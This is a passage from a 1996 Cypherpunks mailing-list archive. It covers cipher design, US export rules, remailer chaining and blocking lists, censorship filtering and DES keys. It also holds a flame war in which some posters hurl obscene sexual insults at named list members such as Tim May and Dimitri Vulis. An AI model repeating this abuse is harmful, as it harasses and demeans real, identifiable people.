path if you don`t believe me, >> >> ]if you still don`t here`s my PGP public key signed by the EFF, they >> >> ]don`t sign keys here and there without checking ID`s... >> >> ] >> >> ]Type Bits/KeyID Date User ID >> >> ]pub 1024/5BBFAEB1 1996/07/30 Paul Bradley >> >> ] >> >> ]- -----BEGIN PGP PUBLIC KEY BLOCK----- >> >> ]Version: 2.6.3ia >> >> ] >> >> ]mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 >> >> ]6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 >> >> ]sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR >> >> ]tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy >> >> ]NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP >> >> ]Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b >> >> ]j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k >> >> ]C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ >> >> ]9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 >> >> ]En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 >> >> ]YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp >> >> ]put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW >> >> ]LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi >> >> ]mUqFH41Z7NkyO8ZFdi5GGX0= >> >> ]=CMZA >> >> ]- -----END PGP PUBLIC KEY BLOCK----- >> >> ] >> >> ] >> >> ] >> >> ]-----BEGIN PGP SIGNATURE----- >> >> ]Version: 2.6.3ia >> >> ]Charset: cp850 >> >> ] >> >> ]iQCVAwUBMkzuH75OPIRbv66xAQHSmQQAqw0F/lIsCcQwOpiSQDx4hMqOVVUVXbyR >> >> ]3RMWY20ECE0TpAtJ6hkAiqphsWUSBqiFj2kGHMh+jHSHXIMPF+m1qtwVbgutJC7B >> >> ]8VYWj0VP+bGu5dEUisLrVHDNj5ucEIDyK2GnqObiCiKARFUbOuZnMQOp9TDJqibh >> >> ]2Wqa5+h8R7g= >> >> ]=/M2U >> >> ]-----END PGP SIGNATURE----- >> >> ] >> >> ] Datacomms Technologies web authoring and data security >> >> ] Paul Bradley, Paul at fatmans.demon.co.uk >> >> ] Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org >> >> ] Http://www.cryptography.home.ml.org/ >> >> ] Email for PGP public key, ID: 5BBFAEB1 >> >> ] "Don`t forget to mount a scratch monkey" >> >> >> >Fuckhead. >> >Fuckhead. We know your behind Vulis, Cock-sucker From stewarts at ix.netcom.com Sun Sep 29 23:18:56 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 30 Sep 1996 14:18:56 +0800 Subject: [CRYPTO] Does any body know anything about this? Message-ID: <199609300436.VAA08532@netcomsv.netcom.com> At 02:38 PM 9/29/96 -0700, some nobody wrote: >Is this just more snakeoil or is this real? Neither Matt Blaze nor Ross Anderson are particularly on the pro-snake-oil side.... Sounds like an interesting talk and I'd enjoy being there for a variety of reasons, including being able to time-travel back to Last Monday :-) One difference between snake oil salesmen and mathematical cryptographers is that the latter talk about what they're doing, why it's as strong as it is, and how it relates back to other known hard problems or attack techniques. If this is sufficiently hard, cool. Most of the symmetric-key attacks these days are based on being sufficiently messy to be hard to attack, and on resisting known attacks, but there's no particular way to prove how hard they are - you can just show that they're messier than any currently known techniques can untangle. On the other hand, the experience with most public-key techniques is that it's hard to adapt NP-hard problems to crypto in ways that don't introduce special forms that can fall apart when handled right - the knapsack problem was a good example. Factoring and discrete-log still appear to be hard problems, but it would be nice to have other known-hard public-key systems. It would also be nice to have private-key systems that use NP-hard problems in strong ways, especially if it doesn't make them appallingly slow :-) >TITLE: SYMMETRIC-KEY CIPHERS BASED ON HARD PROBLEMS >A useful principle in cipher design is to reduce or at least relate >closely the cryptanalysis of the cipher to some long-studied problem >that is believed to be difficult. Most public-key ciphers follow this >principle fairly closely (e.g., RSA is at least similar to factoring). >Modern symmetric-key ciphers, on the other hand, can rarely be reduced >in this way and so are frequently designed specifically to resist the >various known cryptanalytic attacks. In this informal talk, we examine >a simple cipher primitive, based on Feistel networks, for which recovery >of its internal state given its inputs and outputs is NP-complete. We >outline simple and efficient block- and stream- cipher constructions >based on this primitive. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From perry at piermont.com Sun Sep 29 23:26:37 1996 From: perry at piermont.com (Perry E. Metzger) Date: Mon, 30 Sep 1996 14:26:37 +0800 Subject: Does any body know anything about this? In-Reply-To: <199609300328.WAA21279@bermuda.io.com> Message-ID: <199609300431.AAA12492@jekyll.piermont.com> "Douglas R. Floyd" writes: > Matt Blaze isn't a snake oil type. He from what I have seen is one of the > "good guys". True. > I think, he is the maker of S/KEY, IIRC. False. He's done many cool things, but not S/KEY. Perry From stewarts at ix.netcom.com Sun Sep 29 23:56:08 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 30 Sep 1996 14:56:08 +0800 Subject: Cryptography.. Message-ID: <199609300453.VAA09353@netcomsv.netcom.com> At 03:03 AM 9/29/96 -0700, Erp wrote: >What is the maximum encryption allowed to be created. With export >restrictions in mind, and without export restrictiosn in mind... >Thanks... By WORLD and US standards please... The laws of nature don't appear to provide any maximum strength, assuming you run out of atoms to store your data before you run out of capacity for your computer, and _you'll_ be out of cash long before that :-) For mathematically strong algorithms, you can make the work a cracker has to do be exponentially larger than the amount of work you have to do to decrypt, so you win. Different governments have different rules, and many have no rules. Bert-Jaap Koops has a summary that (last time I looked) was at http://cwis.kub.nl/~frw/CRI/projects/bjk/lawsurvy.htm about different governments' crypto use and export rules. For the US, you can export cryptography software if you get permission, and you can usually get permission if you're using up to 40-bit symmetric-key keys and 512-bit public keys, or if you're writing software that's strictly for banking. You usually can't get permission for stronger crypto than that, unless you're a registered international arms dealer and are only selling your crypto gear to Friends Of The Pentagon. There aren't any restrictions on the strength of crypto you can use for messages you're exporting, only on software you export. And there are somewhat bizarre interpretations of "export", including telling foreigners inside US borders if they're not US subjects. Domestically, there are no restrictions on crypto you can write and use inside the US, subject of course to the bizarre interpretations of "domestically" that accompany "export". # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From varange at crl.com Mon Sep 30 00:02:34 1996 From: varange at crl.com (Troy Varange) Date: Mon, 30 Sep 1996 15:02:34 +0800 Subject: Vulis FUCKHEAD sucks Timmy's Cock In-Reply-To: Message-ID: <199609300441.AA10704@crl12.crl.com> Vulis sucks Timmy's boyfriend's cock. > > Timmy May has no life. > > >From: Troy Varange > >Message-Id: <199609300332.AA09870 at crl12.crl.com> > >Subject: Re: [SPAM] More "fuckhead" fan mail from Timmy "peteur" May > >To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) > >Date: Sun, 29 Sep 1996 20:32:58 -0700 (PDT) > >In-Reply-To: from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 09:45:41 pm > >X-Mailer: ELM [version 2.4 PL23] > >Mime-Version: 1.0 > >Content-Type: text/plain; charset=US-ASCII > >Content-Transfer-Encoding: 7bit > >Content-Length: 4378 > > > >> berserk > >> Timmy May has gone . Has he been eating speed? > >> bananas > >> > >> >From: Troy Varange > >> >Message-Id: <199609300138.AA08482 at crl12.crl.com> > >> >Subject: Re: [SPAM] More fan mail from Timmy "peteur" May > >> >To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) > >> >Date: Sun, 29 Sep 1996 18:38:05 -0700 (PDT) > >> >In-Reply-To: from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 07:14:50 pm > >> >X-Mailer: ELM [version 2.4 PL23] > >> >Mime-Version: 1.0 > >> >Content-Type: text/plain; charset=US-ASCII > >> >Content-Transfer-Encoding: 7bit > >> >Content-Length: 3442 > >> > > >> >> > >> >> What has Timmy been smoking? > >> >> > >> >> ]From paul at fatmans.demon.co.uk Sun Sep 29 19:03:40 1996 > >> >> ]Received: by bwalk.dm.com (1.65/waf) > >> >> ] via UUCP; Sun, 29 Sep 96 19:14:06 EDT > >> >> ] for dlv > >> >> ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; > >> >> ] id AA25790 for dlv at bwalk.dm.com; Sun, 29 Sep 96 19:03:40 -0400 > >> >> ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net id ac16129; > >> >> ] 29 Sep 96 15:59 BST > >> >> ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net > >> >> ] id aa09441; 29 Sep 96 15:54 BST > >> >> ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP > >> >> ] id AA843903697 ; Sat, 28 Sep 96 09:41:37 +0000 > >> >> ]Comments: Authenticated sender is > >> >> ]From: paul at fatmans.demon.co.uk > >> >> ]To: "Dr.Dimitri Vulis KOTM" > >> >> ]Date: Sat, 28 Sep 1996 09:21:37 +0000 > >> >> ]Mime-Version: 1.0 > >> >> ]Content-Type: text/plain; charset=US-ASCII > >> >> ]Content-Transfer-Encoding: 7BIT > >> >> ]Subject: Re: Possible subs attack???? > >> >> ]Priority: normal > >> >> ]X-Pm-Encryptor: JN-PGP-P, 4 > >> >> ]X-Mailer: Pegasus Mail for Windows (v2.31) > >> >> ]Message-Id: <844008901.9441.0 at fatmans.demon.co.uk> > >> >> ] > >> >> ]-----BEGIN PGP SIGNED MESSAGE----- > >> >> ] > >> >> ] > >> >> ]> The lying sack of shit Timmy May writes: > >> >> ] > >> >> ]> The lying sack of shit Timmy May lies again, as usual. > >> >> ] > >> >> ]Fuck you, > >> >> ] > >> >> ]I am not Tim May, Check out the return path if you don`t believe me, > >> >> ]if you still don`t here`s my PGP public key signed by the EFF, they > >> >> ]don`t sign keys here and there without checking ID`s... > >> >> ] > >> >> ]Type Bits/KeyID Date User ID > >> >> ]pub 1024/5BBFAEB1 1996/07/30 Paul Bradley > >> >> ] > >> >> ]- -----BEGIN PGP PUBLIC KEY BLOCK----- > >> >> ]Version: 2.6.3ia > >> >> ] > >> >> ]mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 > >> >> ]6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 > >> >> ]sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR > >> >> ]tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy > >> >> ]NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP > >> >> ]Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b > >> >> ]j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k > >> >> ]C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ > >> >> ]9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 > >> >> ]En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 > >> >> ]YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp > >> >> ]put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW > >> >> ]LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi > >> >> ]mUqFH41Z7NkyO8ZFdi5GGX0= > >> >> ]=CMZA > >> >> ]- -----END PGP PUBLIC KEY BLOCK----- > >> >> ] > >> >> ] > >> >> ] > >> >> ]-----BEGIN PGP SIGNATURE----- > >> >> ]Version: 2.6.3ia > >> >> ]Charset: cp850 > >> >> ] > >> >> ]iQCVAwUBMkzuH75OPIRbv66xAQHSmQQAqw0F/lIsCcQwOpiSQDx4hMqOVVUVXbyR > >> >> ]3RMWY20ECE0TpAtJ6hkAiqphsWUSBqiFj2kGHMh+jHSHXIMPF+m1qtwVbgutJC7B > >> >> ]8VYWj0VP+bGu5dEUisLrVHDNj5ucEIDyK2GnqObiCiKARFUbOuZnMQOp9TDJqibh > >> >> ]2Wqa5+h8R7g= > >> >> ]=/M2U > >> >> ]-----END PGP SIGNATURE----- > >> >> ] > >> >> ] Datacomms Technologies web authoring and data security > >> >> ] Paul Bradley, Paul at fatmans.demon.co.uk > >> >> ] Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org > >> >> ] Http://www.cryptography.home.ml.org/ > >> >> ] Email for PGP public key, ID: 5BBFAEB1 > >> >> ] "Don`t forget to mount a scratch monkey" > >> >> > >> >Fuckhead. > >> > >Fuckhead. We know your behind Vulis, Cock-sucker > and he swallows From moroni at scranton.com Mon Sep 30 00:03:14 1996 From: moroni at scranton.com (Moroni) Date: Mon, 30 Sep 1996 15:03:14 +0800 Subject: Utah as a Religious Police State In-Reply-To: Message-ID: I never cease to be surprised by the interest that gentiles show in working mormon communities while totally neglecting their own failing areas. On Sun, 29 Sep 1996, Timothy C. May wrote: > > (I received this message, with "cypherpunks at sybase.com" as well as > "tcmay at sybase.com" (???) cc:ed, so I assume this message was intended for > the Cypherpunks list, with some sybase domain name weirdness, or reflector, > going on.) > > At 12:30 PM -0400 9/29/96, Ryan Russell/SYBASE wrote: > >I guess that depends on your definition of liberty. The Mormons > >originally moved there to have a place to practice their religion, > >and have freedom from persecution. I suppose one could extend that > >to wanting a place to have the freedom to have a set of rules consistant > >with their beliefs. Should that include freedom from interferance from > >folks such as yourself who want to change their rules, even though > >you're not presently effected? > > Well, if Utah can rig a way to _secede_ from the Union, your arguments > would make more sense. But so long as they are part of these United States, > their religious beliefs about when children should be at home cannot > supersede basic liberties. > > (There are some thorny issues about whether _minors_ have full civil > rights. But I certainly know that _my_ civil rights are being affected when > my children are not allowed on the streets after some hour. If my child is > out, this is my problem. I neither want cops to stop-and-detain my > children, nor do I want my tax monies to be used to control the behavior of > other people's children. Providing no crimes are being committed, curfews > for the sake of controlling the behavior of children are no more just than > would be a bunch of related behavior control laws, e.g., a ban on comic > books, a mandate that all children join after-school youth leagues, etc.) > > As for "changing their rules," you're missing the point. There are > presumably many in Utah who believe as I do (maybe even some Mormons). > Those who are living in Utah, as renters, owners, whatever, should not be > bound by unconstitutional rules, no matter how many Mormon Elders favor > them. Unless the Mormons own _all_ of the property (and maybe not even > then, as renters have civil rights), they cannot impose their own notions > of morality on the rest of the population, except in compelling cases > (e.g., involving the well-known actual _crimes_). > > I don't mean to pick on Mormons, as other communities have also attempted > to impose curfews and other restricitions on the children of others. My ire > was raised by Attila's enthusiastic support for laws which no > freedom-loving person should be enthusiastic about. Again, I have no > problem with Attila restricting his own children's movements, or joining > with other parents to control the behavior of their _own_ children, via > religious camps, religious schools, youth leagues, etc. He can even make > his own kids wear funny uniforms, funny religious hats, whatever. > > But, for example, tellling _me_ when _my_ children may be out on public > streets (doing nothing illegal, neither robbing nor spray-painting nor > committing any other real crimes) is unacceptable. > > I urge Attila (and others) to rethink enthusiastic support for curfews. > > --Tim May > > > > We got computers, we're tapping phone lines, I know that that ain't allowed. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^1,257,787-1 | black markets, collapse of governments. > "National borders aren't even speed bumps on the information superhighway." > > > > From scmayo at rschp2.anu.edu.au Mon Sep 30 00:03:27 1996 From: scmayo at rschp2.anu.edu.au (Sherry Mayo) Date: Mon, 30 Sep 1996 15:03:27 +0800 Subject: GCHQ releases Venona files (from UK Telegraph) Message-ID: <199609300451.VAA05353@toad.com> Hi all, A couple of articles from the UK Daily Telegraph may be of interest. The earlier one "Codebreakers come clean" is about the upcoming congference on cold war intelligence & mentions the continued release of the NSA's Venona files (see http://www.nsa.gov:8080/docs/venona/venona.html) The article is at: http://www.telegraph.co.uk/et/access?ac=116192744309&pg=//96/9/29/wspy29.html The second is about the GCHQ (UK equivalent of NSA) releasing its own Venona files in response to the NSA release. http://www.telegraph.co.uk/et/access?ac=116192744309&pg=//96/9/30/ngch30.html These are being released into the public records office, but there is no indication that they will appear on the net for the time being. Sherry From haystack at cow.net Mon Sep 30 01:13:27 1996 From: haystack at cow.net (Bovine Remailer) Date: Mon, 30 Sep 1996 16:13:27 +0800 Subject: A periodic alert regarding Tim May Message-ID: <9609300606.AA23260@cow.net> Tim May styles his facial hair to look more like pubic hair. From rp at rpini.com Mon Sep 30 01:34:52 1996 From: rp at rpini.com (Remo Pini) Date: Mon, 30 Sep 1996 16:34:52 +0800 Subject: crypto cd Message-ID: <9609300624.AA07020@srzts100.alcatel.ch> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: cypherpunks at toad.com Date: Mon Sep 30 07:21:49 1996 Still looking for material... especially: sci.crypt archives (10.1994 until now... Mark Riordan???) sci.crypt.research archives (all) other releavant news groups has anybody anybody got anything? remo - ------< fate favors the prepared mind >------ Remo Pini rp at rpini.com PGP: http://www.rpini.com/crypto/crypto.html - ----< words are what reality is made of >---- -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv Comment: http://www.rpini.com/crypto/crypto.html iQEVAwUBMk9Y7hFhy5sz+bTpAQHz3wf/VD175Mf8ShQ0drqvwH4m5Yf7N9iE0ZeG V5Nv80Um3ofnhZvFscgijgPf54+25a8ogWJcEB3k+SEROvkeQkA49QmEYPIlotYi 2U6+xb5bgjQ5NvRMe09o+3cBSd7y3HabWpNPBtCX4cLxKWm3DOw+xOa+CWf8Kmuu nuaFaJhKG1RYkr/3QNPFlDSbh7PPi1Rg7go0LdVMkQUzMgWizkAOJJlg0cl5ZdVE ZV6JdiQD6o9JBWKEOX1Y4mqxQ9tRRDagfADa3S8wPOpT3WxWKVgKgbjLtvUsXrgZ miokoDGNSs2Cxlw+wk9kxKAbRrsCfoEAAPygvCHEDp0WGxA445iRZA== =NT66 -----END PGP SIGNATURE----- From hereh at stud.uni-sb.de Mon Sep 30 01:34:54 1996 From: hereh at stud.uni-sb.de (Hendrik Reh) Date: Mon, 30 Sep 1996 16:34:54 +0800 Subject: Looking for Codebreaker's by David Kahn Message-ID: <324EF031.187D@stud.uni-sb.de> Im looking for Codebreakers by David Kahn !! Can anybody give me a hint where i can get this book thanx -- ,,,, Gruss, /'^'\ Hendrik ( o o ) -oOOO--(_)--OOOo------------------------------------------------ Hendrik Reh, Tel. : +49 0681 48362 .oooO WWW: http://fsinfo.cs.uni-sb.de/~garetjax/ ( ) Oooo. eMail: hereh at stud.uni-sb.de ---\ (----( )------------------------------------------------- \_) ) / (_/ From dthorn at gte.net Mon Sep 30 02:19:59 1996 From: dthorn at gte.net (Dale Thorn) Date: Mon, 30 Sep 1996 17:19:59 +0800 Subject: Cryptography.. In-Reply-To: Message-ID: <324F6D8E.370B@gte.net> Erp wrote: > What is the maximum encryption allowed to be created. With export > restrictions in mind, and without export restrictiosn in mind... > Thanks... > By WORLD and US standards please... > much appreciated.. > export from the US to elsewhere that is also.. > reply asap is much appreciated Well, if you do the wrong thing, better encrypt it so nobody knows.... From dthorn at gte.net Mon Sep 30 02:31:51 1996 From: dthorn at gte.net (Dale Thorn) Date: Mon, 30 Sep 1996 17:31:51 +0800 Subject: Workers, Public Schools, Tradesmen, and Justice In-Reply-To: <199609290126.UAA00307@smoke.suba.com> Message-ID: <324F65DC.21FF@gte.net> snow wrote: > Mr. May said: > > At 1:35 PM -0500 9/27/96, jbugden at smtplink.alis.ca wrote: > > >If you want to refuse those who are too stupid or anti-social from > > >Public Schools in order to improve the social or intellectual > > >climate, you better have a solution for the resulting cast-offs. [text deleted: trade schools, welfare system, etc.] > People die for all manner of reasons every day. Fuck'em. > Petro, Christopher C. > petro at suba.com > snow at smoke.suba.com Seems to me they had excellent solutions in the 1930's. Bread lines for those who needed food and couldn't find work. Labor camps for those who wanted to work anyway. From gbroiles at netbox.com Mon Sep 30 02:34:41 1996 From: gbroiles at netbox.com (Greg Broiles) Date: Mon, 30 Sep 1996 17:34:41 +0800 Subject: What about making re-mailers automatically chain? Message-ID: <3.0b19.32.19960929222542.006b0ed0@ricochet.net> >Would it be a good idea to have a re-mailer "randomly" decide whether to >send the mail to the destination or to another re-mailer. No. The remailer user should be presumed to know what s/he wants. Some remailer users may want to optimize for speed and certainty of delivery and therefore use a short chain; other users may want to optimize for more difficult traceability, and consequently choose a long chain. Remailers shouldn't try to rewrite the user's (perhaps) deliberate balancing of these factors. Also, users may choose to use or not use certain remailers based upon their policies, the reputation of the operators, the legal rules affecting the operators, and so forth. These choices should also be left to the user and not overridden by third parties. > If all >re-mailers performed this way, not even the sender would know the path. I don't see why this is useful. As things work now, only the sender knows the path, assuming chaining and nesting encryption. How does taking away the sender's knowledge add security? Adding hops to the chain requires that remailers keep track of other remailers; a robust way of doing this would require that they also keep track of reliability, because deciding to add a downed (or unreliable) remailer to a chain would be harmful. To prevent an active and hostile eavesdropper from adding itself as a remailer eligible to receive extra hops (and then dropping or logging the traffic), this remailer status information should be provided by a trusted source in a secure manner. All of this (adding remailer status tracking based on frequent updates of digitally signed information from a trusted third party) can be done, but it's a pain in the ass to code, and it doesn't add anything that users can't get for themselves. (Users who want long difficult-to-trace chains can already generate them. They can also let software generate random chains at the source.) It also may degrade performance for users who value speed and reliability over untraceability. So I suggest that it's not very useful. The best way to implement this would be to modify remailers to use "Anon-To: random" or "Random-To: xxx at yyy.zzz" header commands, such that users who desired the random hop behavior could get it, but users who didn't want it wouldn't get it unexpectedly. (Isn't some remailer doing this already? I've lost track.) -- Greg Broiles | "We pretend to be their friends, gbroiles at netbox.com | but they fuck with our heads." http://www.io.com/~gbroiles | | From dthorn at gte.net Mon Sep 30 02:43:37 1996 From: dthorn at gte.net (Dale Thorn) Date: Mon, 30 Sep 1996 17:43:37 +0800 Subject: active practice in America In-Reply-To: <199609290438.WAA23813@infowest.com> Message-ID: <324F6997.4856@gte.net> attila wrote: > In <199609290133.UAA00319 at smoke.suba.com>, on 09/28/96 > at 08:33 PM, snow said: > > A Person going by the name Attila said: > > to put it another way: in criminal procedings: I would rather > > be considered guilty, until proven innocent; than I would be > > presumed innocent, until proven guilty beyond a reasonable doubt. > =If you were the person being _tried_ for a crime, you would rather > =have to prove that you COULDN'T POSSIBLY have commited the crime as > =opposed to having to have the government PROVE that you DID DO it? > you bet --the objective of the defense is to cast aspersions > on the government prosecuters --in other words, create that > doubt. you do not need to prove your innocence unconditionally, > just "taint" the prosecuter a bit. however, in many cases you are > guaranteed a trial by a jury of your peers. > as for peers --look at OJ, and the reverse weighting of the > Santa Monica jury v. downtown. Speaking of peers, what would the founding fathers have said about the trial of the officers in the Rodney King case? Would they, as police officers, have a right to a jury of their peers? Would their peers be the people in Simi Valley, where many or most of them live? Or would it be more appropriate to have a jury of the victims' peers? Or both? From stewarts at ix.netcom.com Mon Sep 30 02:50:43 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 30 Sep 1996 17:50:43 +0800 Subject: Making Remailers Widespread [REMAILERS] Message-ID: <199609300728.AAA17384@netcomsv.netcom.com> At 09:37 AM 9/29/96 EDT, you wrote: >How about: maintain a list of trusted blocking-list sites (comparable to the >list of remailers used for chaining) and when it comes the time to update the >local copy of the blocking list, ask a random one on the list; if it's down, >ask another random one on the list. There may even be more than one list. :-) Getting more complex, but it might be workable. >> sender-blocking list ... >With most ISP's it's trivial to forge one's From: header in SMTP. >Switching to another dime-a-dozen throwaway account is also trivial. >Just admit that you can't block senders, and don't pretend that you >can - false pretenses destroy one's credibility. You obviously can't source-block a determined spammer, but you can slow down some spam attacks, especially if they're one individual using his/her regular account. It's no panacaea, but it helps. Also, if you source-block based on patterns anywhere in the header, you can catch less capable email forgers. >I think I see a way to accomplish this without too much trouble. >When an e-mail is directed at u at c4.c3.c2...c1, the code that checks >for blocking will search for the following records in the blocking list: >u at c4.c3.c2...c1 (exact match) >*@c4.c3.c2...c1 (replace user by *) >u@*.c3.c2...c1 (replace leftmost .-separated piece of domain by *) >*@*.c3.c2...c1 (both) >and repeat until there are only 2 components left in the domain name. That'd work. It's clunky, but there's no avoiding clunkiness for this sort of thing, and it does preserve privacy. >Now, the question is, who would be allowed to add records containing >'*' to the blocking list using the cookie protocol? I suggest that it be >one of the contacts listed in Internic's database. postmaster at domain is (ostensibly) guaranteed to exist. The Internic database is an interesting alternative, but for this I suspect postmaster is good enough. There's also the problem that for many domains, where smallcompany.com is virtual on an ISP, the Internic database will generally list someone at the ISP, who probably has no interest in the issue, rather than someone responsible for making decisions about smallcompany.com >Thus a blocking record for cypherpunks at toad.com could be added by >anyone listed in toad.com's Internic entry. There's no need for any >Remailer Cabal [tinc] to maintain blocking lists. For destination blocking, I agree that users should be able to block their own stuff as automagically as possible. For source blocking, most of the need is for spams and abusers that have been tracked down (or identify themselves in their postings), and that takes human thought. In particular, spammers are unlikely to block themselves from the remailers (:-), but forgers may try to block legitimate users. >One other suggestion: instead of storing one bit of information (the >address is on the list or not), why not have several flag bits. >E.g., the blocking list could contain records similar to: >hash - e.g. 160-bit SHA >flags - e.g. reserve 32 bits Interesting. I suspect the state of the art would be to collect the bits with a disclaimer that there isn't any code to interpret them :-), but it does let you build a blocking database that's usable as capabilities grow. Any suggestions for flags besides block/allow one-way, block/allow two-way, and max-size? I'm thinking of doing a remailer that instead of sending you a message, it sends you a retrieval cookie and lets you send it back to collect the message; blocking that would be another flag. The other kind of blocking that needs adding is blocking by words in message bodies - the spammer that caused me to shut down my remailer and not bring it back up was posting hate messages with somebody else's name and email signed at the bottom. It only took one or two to generate a flood of flames to the victim, and my current remailer couldn't block any followups. Also, since the spammer wasn't generating the flames himself, his spam slipped under the remailer's spam counter, just as hipcrime's did. This sort of blocking also lets you block things like the hipcrime spam and MAKE MONEY FAST. But it's a much more sensitive problem - anybody who can add things to the body-checking list can start doing real censorship, and it's probably best to leave that to individual operators to block, or at least to turn on by hand rather than default. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From nobody at cypherpunks.ca Mon Sep 30 02:57:15 1996 From: nobody at cypherpunks.ca (John Anonymous MacDonald) Date: Mon, 30 Sep 1996 17:57:15 +0800 Subject: Tools for Rendering Censorship Firewalls Ineffective In-Reply-To: <199609300259.TAA04617@dfw-ix8.ix.netcom.com> Message-ID: <199609300727.AAA05186@abraham.cs.berkeley.edu> > The obvious techniques I can see include > 1) Filter on IP address (e.g. German attack on XS4ALL) > 2) Filter on DNS Name > 3) Filter on Patterns in URL > 4) Filter on Patterns in PUT/GET Requests > 5) Filter on Patterns in Response. > 6) Traffic Analysis on reading patterns 7) Punish all those accessing forbidden web sites with caning or forced labor. From yjkim at ssrnet.snu.ac.kr Mon Sep 30 07:04:26 1996 From: yjkim at ssrnet.snu.ac.kr (Kim Yoonjeong) Date: Mon, 30 Sep 1996 22:04:26 +0800 Subject: the key of DES Message-ID: <199609301017.UAA04791@ssrnet.snu.ac.kr> Hello, all ! With given a unknown DES system with 64 bits plaintext p, ciphertext c, can there be MORE THAN ONE keys ? If so, How is the probability (big or small)? Sincerely, - Yoonejong =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Yoonjeong Kim Email: yjkim at ssrnet.snu.ac.kr Department of Computer Engineering Phone: +82-2-875-7726 (office) Seoul National University +82-2-872-9801 (home) Seoul 151-742 Korea Fax: +82-2-875-7726 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From adam at homeport.org Mon Sep 30 07:36:37 1996 From: adam at homeport.org (Adam Shostack) Date: Mon, 30 Sep 1996 22:36:37 +0800 Subject: (Firewalls) Where is that Snake Oil FAQ again? Message-ID: <199609301247.HAA17135@homeport.org> This may of course, just be a troll. ----- Forwarded message from Anonymous ----- >From firewalls-owner at GreatCircle.COM Sun Sep 29 21:27:09 1996 Date: Mon, 30 Sep 1996 02:37:26 +0200 (MET DST) Message-Id: <199609300037.CAA20690 at basement.replay.com> Subject: New Release - Software OTP Encryption. Content-Type: TEXT/PLAIN; charset=US-ASCII To: firewalls at GreatCircle.COM From: nobody at REPLAY.COM (Anonymous) Organization: Replay and Company 